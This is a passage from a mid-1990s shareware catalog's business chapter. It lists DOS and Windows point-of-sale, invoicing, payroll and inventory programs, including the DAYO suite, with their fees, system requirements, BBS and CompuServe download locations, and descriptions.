levels of sales + tax. A label maker is built in. There are many other features + designed to make sales accounting easy. + + + Product: Time is Money + A time and fixed price billing system. See full description on + page 282. + + Product: WInvoices + Invoicing program and much more! See full description on + page 282. + + Chapter 7, "Business" 274 + + + + Product: XPENS + Author: , 815-455-6333 + Version: 1.3 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. HP LaserJet printer; Epson + printer. + Registration fee: $29.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, GEnie, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; XPENS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (or contact userID 72317,2073 for + assistance); XPENS.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID R.WILLIAMS5 for assistance). + PsL#: 10475 + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Designed to provide employers and employees with a quick, easy + to use expense account screen/report that will eliminate the + necessity of keeping a supply of expense report forms and doing + all the arithmetic involved in preparing the report. Because + reports are stored on disk, the employee copy of the report + becomes unnecessary. + + + 7.1.1.1 Accounts receivable + + Product: CashMaster + Produces bid, invoice, statements; tracks A/R. See full + description on page 278. + + 7.1.2 Point-of-sale systems + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 266. + + Product: DAYO LITTLE POS + Author: , 407-291-3960 + Version: 4.62+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + + Chapter 7, "Business" 275 + + + + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOPS.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPS.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A modified version of DAYO POS create to reduce memory + requirement. Useful on LANs and/or networks where memory is + usually at a premium. + + + Product: DAYO ORDER ENTRY + Author: , 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOZE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOZE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales orders based on the DAYO Inventory, Customer, and + other DAYO databases. Orders can be printed on a standard + printer or a Hewlett Packard(tm) Laserjet compatible printer. + The order can be printed on a pre-printed form, on the Laser + printer in a special laser format, or as a standard/default + form. + + + Product: DAYO POS (POINT OF SALE) + Author: , 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 276 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOPE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any size business. It + is the DAYO module that permits you to invoice out your + products while keeping an accurate record of all your 'sales'. + Features include: multiuser (ie: Novell), registers, quote + interface, templates, back orders, cash drawers, packing/ + shipping lists, labels, sales graphs, special pricing, tax + codes, terms codes, credit limits, passwords, MRP interface, + multiple prices, and many reports. + + + Product: DAYO PRICE BOOK + DAYO special pricing, price books & lists. See full + description on page 325. + + Product: DAYO QUOTES + Author: , 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOQE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOQE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales order quotes based on the DAYO Inventory, + Customer, and other DAYO databases. Quotes can be printed on a + standard printer or a Hewlett Packard Laserjet compatible + printer. The quote can be printed on a pre-printed form, on the + laser printer in a special laser format, or as a standard/ + default form. Totally integrated with the DAYO POS and/or + billing & invoicing modules. Templates (kits or bundles), are + supported. + + Chapter 7, "Business" 277 + + + + Product: DAYO RENTAL POS + Author: , 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPR.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPR.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any business that rents + items, equipment, or services, ie: videos, tapes, furniture, + tools, appliances, etc. Requires the regular DAYO POS module + for its reports and configuration settings. It is by default a + multiuser system, allowing almost unlimited numbers of users to + have the ability to simultaneously invoice using this one + program on a PC based LAN/network. + + + Product: DAYO SIMPLE POS + Author: , 407-291-3960 + Version: 4.61+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOP1.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOP1.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + A a modified version of DAYO POS that was created to exclude + the option of selecting a customer. This program is used on + cash accounts only. Useful in grocery store type environments + (where no customer name is required). + + Chapter 7, "Business" 278 + + + + Product: PCINV + Invoice writing. See full description on page 272. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 320. + + Product: Track-It + Author: , 510-828-5892 + Version: 3.07 (12-29-93) + Needs: IBM PC, DOS 3.0 or better. 425k RAM; Hard disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $149.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited BBS, CompuServe, mail support; LAN license; + discounts on upgrades; registration commissions. 1 free update + disk(s) sent out. + Look for: TRKIT307.ZIP on BBSs (call 510-828-4153 to download it + at no charge); TRACKI.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 72560,2466 for assistance). + Download size: 343k (about 26 minutes with a 2400 baud modem) + Description: + Includes a wide variety of inventory functions as well as + invoicing, order entry, and purchase orders. Tracks both + serialized and non-serialized stock. Includes 35+ reports, + mouse support, on-line help, and a full manual. The number of + stock codes is limited only by disk space. Network and multi- + user compatible. + + + 7.1.3 Billing/invoice systems + + Product: CashMaster + Author: , 908-288-1502 + Version: 1.51 (03-05-95) + Needs: IBM PC, DOS 3.1 or better. 450k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $75.00 (add $4.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 5); discounts on other products; discounts on + + Chapter 7, "Business" 279 + + + + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; CIM151.ZIP on CompuServe + in CIS:ACCOUNTING forum LIBrary 15 (or contact userID + 76506,1606 for assistance). + SWREG#: 4956 + PsL#: 11903 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A bid and invoice generator for anyone requiring a large amount + of text (up to 20 lines per bid/invoice) to describe the work + being done ('scope of work'). It allows for unlimited line + items per bid/invoice with each line item having up to three + additional lines of description. Tracks open receivables by + customer and job. Originally written for sub-contractors who + need to keep track of open invoices to both general contractors + and homeowners. Bookkeeping know-how not needed. + + + Product: DAYO BACK ORDERS (BO) + Author: , 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOOE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOOE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + The maintenance module for the processing of all your + customers/sales backorders. Working with DAYO POS, it + determines and manages the filling (allocation) of your + customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + Chapter 7, "Business" 280 + + + + Product: DAYO BILLING & INVOICING + Author: , 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBI.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOBI.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Permits you to invoice your products while keeping an accurate + record of all your 'sales'. Features include: Multiuser (ie: + Novell), registers, quote interface, templates, back orders, + cash drawers, packing/shipping lists, labels, sales graphs, + special pricing, tax codes, terms codes, credit limits, + passwords, MRP interface, multiple prices, and many reports. + Very similar to DAYO POS, and uses the same manual. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Manage schedules; create quotes & price books. See full + description on page 305. + + Product: Financial Freedom Billing Mgr. + Author: , 407-951-2268 + Version: 2.3 (12-15-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 5); + discounts on other products. + Look for: FFBMGR.ZIP on BBSs; FFBMGR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11. + Download size: 619k (about 46 minutes with a 2400 baud modem) + Description: + Features include unlimited customers, three invoice printing + formats, user-selectable report sorting and sub-total options, + creates and prints mailing lists. Maintains purchase + histories, monthly and yearly summaries and many more reporting + options. Designed for any type of business activity. Will + streamline your billing and collection activities! + + Chapter 7, "Business" 281 + + + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 297. + + Product: J.T.S. TIME SHEETS + Author: , 01625-614669 + Version: 1 (09-20-94) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; Hard disk. + Strongly recommended: EMS memory. + Registration fee: $49.00 + Registration benefits: Full program functionality; 3 months of + phone, CompuServe, mail support; all ASP-wide offers (see + page 5). + Look for: availability unknown on BBSs; JTSTS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (or contact userID 100410,717 for + assistance). + SWREG#: 3533 + PsL#: 11594 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Creates client bills based on the time spent on the clients + accounts by the firms employees. Each employee can have a + separate charge out rate per hour. In addition to timed entries + the time sheets accept fixed price items and pre payments by + clients. The system also keeps an up to date "Work in Hand" + figure for accounting purposes. + + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 312. + + Product: PC-AR + Author: , 707-255-4475 + Version: 4.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts receivable and sales summary program to + get the bills out. Contains many powerful features such as + auto billing, late charges, aging and alpha account numbers. + Reports include plain paper or pre printed statements, accounts + receivable ledger, charges and payments listing, sales summary + (with or without detail), customer activity report, mailing + labels and aging report. Inactive customers may be omitted + + Chapter 7, "Business" 282 + + + + from most reports. Up to 8000 customers and invoices per + month. + + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 388. + + Product: Rosewood Journal + Invoice journal and accounts receivable. See full description + on page 273. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 320. + + Product: Time is Money + Author: , 407-767-9278 + Version: 2.3 (12-07-94) + Needs: IBM PC, DOS 2.0 or better. 450k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $95.00 + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; source + code; all ASP-wide offers (see page 5). + Look for: TIM23.ZIP on BBSs; TIM23.ZIP on CompuServe in + CIS:CONSULT forum LIBrary 8 (or contact userID 76702,1355 for + assistance). + Download size: 195k (about 15 minutes with a 2400 baud modem) + Description: + A time and fixed price billing system that completely automates + your billing and receivables. It supports time billing in any + increment, and also the sale of equipment or fixed price + contracts. Facilitates the time recording and billing process + for anyone that bills by time and project. Maintains records, + automatically generates invoices, and keeps a history of the + payment of those invoices. Simple to operate, yet versatile. + + + Product: Tolman Dental Program + Dental office managment program. See full description on + page 314. + + Chapter 7, "Business" 283 + + + + Product: WInvoices + Author: , 201-635-1824 + Version: 1.0d (05-31-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Epson printer. + Registration fee: $29.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe, mail support; + all ASP-wide offers (see page 5). Lifetime free upgrading + allowed. + Look for: WINV10D.ZIP on BBSs; WINV.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 5888 + PsL#: 14036 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + An invoicing program which also keeps track of parts, + customers, work orders, and personnel. Comes in two versions; + Standard Edition allows you to create work orders and Invoices, + as well as to choose from several pre-defined reports. Deluxe + Edition includes all of the features of the Standard Edition, + plus it gives you the ability to define your own reports, + enabling you to view your data based on any criteria you care + to enter. + + + 7.1.4 Purchase order systems + + Product: DAYO INVENTORY + Inventory control and purchase orders. See full description on + page 287. + + Chapter 7, "Business" 284 + + + + Product: Office Supplies Tracker + Author: , 317-782-9903 + Version: 1.42 (03-18-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $39.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 5). + Look for: OST142.ZIP on BBSs (call 317-784-2147 to download it at + no charge); OST.ZIP on CompuServe in CIS:PCAPP forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 2445 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Complete office supplies tracking system. Maintain inventory + listings and quantities, stock locations, generate purchase + orders and purchase requisitions, and maintain vendor listings. + Automatically adjusts in-stock levels when orders are recieved + and posted. Automatic notification when in-stock levels drop + below specified quantities. Includes pop-up calculator and + appointment calendar. Context-sensitive online help. + + + Product: Track-It + Point of sale with inventory control. See full description on + page 278. + + 7.1.5 Payroll systems + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 266. + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 296. + + Product: DAYO PAYROLL + Author: , 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 285 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOYE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOYE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provides a system for the computation of payroll for businesses + of any size. Features include: Multiuser, unlimited employees, + Weekly, BiWeekly, and/or Monthly payrolls, quarterly, year to + date (YTD), and current summary databases, Automatic payroll + posting & computation, vacation, sick pay/days, check printing, + multiple states, SDI tax, overtime & premium hourly wages, up + to 8 deductions, view reports on screen, medicare and many + reports. + + + Product: PC-PR + Author: , 707-255-4475 + Version: 2.4 (02-01-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Printer with a + condensed-mode font. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; bonus + data; discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple payroll writing program. 1994 federal tax + tables and most state tax tables are included. Employees are + automatically sorted in alphabetical order. Allows up to five + deductions per check for 1200 employees. Reports include + employee listing (can be used as payroll input sheet), federal + liability by paydate, quarterly payroll listing, payroll + ledger, payroll check listing, employee history report and + annual W-2's. Supports tips, cafeteria plans and 401K plans. + + + Product: Time Keeper [***] + D.base to record and report empl. attendance. See full + description on page 298. + + + 7.2 Inventory systems + + Product: Around The House + Complete personal/home information manager. See full + description on page 138. + + Chapter 7, "Business" 286 + + + + Product: Book Librarian + Book cataloging program. See full description on page 459. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 233. + + Product: DAYO BAR CODE 3 OF 9 + Author: , 407-291-3960 + Version: 4.55+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM. DAYO Inventory. + Strongly recommended: CGA monitor; Hard disk; HP LaserJet + printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; disks + of other shareware; discounts on other products; discounts on + upgrades. 1-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: DAYO39.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYO39.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Prints 3 of 9 bar codes with an Epson (tm) or IBM (tm) + compatible dot matrix printer. It is integrated with the DAYO + Inventory and the DAYO Customer databases. Labels are printed + onto standard labels (3.5 by 15/16 inches at 6 lines per inch). + The inventory bar code label consists of an item number, its + bar code, vendor item number, description, unit of issue, + weight, and bin/location. The customer bar code label consists + of a customer number, its bar code, customer's name and + telephone. + + + Product: DAYO END OF PERIOD + Author: , 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. DAYO Inventory. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 287 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOEE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOEE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains routines that are normally run at the end of a + reporting period (ie: month). Permits you to permanently remove + deleted records from the accounts receivable (AR) and accounts + payable (AP) databases, and to erase old report text files. + There is also a routine for performing a physical inventory. + Many reports are included (ie: AR ageing, AP summary, inventory + movement). + + + Product: DAYO INVENTORY + Author: , 407-291-3960 + Version: 4.56+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOIE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOIE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A multiuser inventory control, purchasing, and vendor + maintenance application. Use it to create and maintain an + inventory of any product. Features include multiuser (ie: + Novell, LANtastic), reports, labels, lists, and a graph. The + ability to upgrade and expand your system is available with the + addition of supporting DAYO products (ie: DAYO POS, DAYO AR, + DAYO AP, etc.). + + Chapter 7, "Business" 288 + + + + Product: DAYO MRP + Author: , 407-291-3960 + Version: 4.61+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOWE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOWE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + A routine designed for manufacturers. Builds items (end items) + from item (components) in the inventory database. End items can + later be placed into inventory for later sales. Supports multi- + level bill of materials. Features include automatic inventory + posting and creation of inventory adjustment records, databases + are dBASE(tm) compatible, multiuser, and many reports. + + + Product: DAYO RETURN MANAGEMENT SYSTEM + Author: , 407-291-3960 + Version: 4.00+ (12-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOFE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOFE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provide the means to record and track returns of your product. + Integrates to DAYO Inventory and its multiple warehouses to + allow tracking of items being returned (ie: breakages, + warranties, return to vendors). Creates RMA numbers. + + Chapter 7, "Business" 289 + + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 327. + + Product: Household Register + Home/office inventory program. See full description on + page 525. + + Product: ICP + Author: , 703-943-4635 + Version: 11 (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; + Hercules monitor; Hard disk. + Registration fee: $65.00 (add $8.00 for shipping to Canadian + addresses) (add $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, newsletter, mail support; bonus + utilities; all ASP-wide offers (see page 5). + Look for: ICP11.ZIP on BBSs (call 703-949-4464 to download it at + no charge); ICP11.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 73530,3236 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Description: + A full-featured, general purpose inventory control system with + modules to sell, order, and receive inventory. Features complex + filtering (segmenting) of the data base by using the "and/or" + logical operators. Supports LIFO, FIFO, and weighted average + costing. Supports composite inventory (inventory items + consisting of other inventory items) and serialized inventory. + Can be upgraded to complete point-of-sale system (PICS) at any + time with no loss of data. Optional bar code module. + + + Product: Inventory Interface + Author: , 313-981-3615 + Version: 7.25 (04-01-95) + Needs: IBM AT (80286), DOS 3.3 or better. 500k RAM; Hard disk. + Strongly recommended: XMS memory. + Registration fee: $165.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + 12-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: II7*.ZIP on BBSs; II7*.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 0 (or contact userID 71344,2354 for assistance). + SWREG#: 3133 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + An extensive Inventory, POS, and MRP package. Completely + integrated within the package are modules for 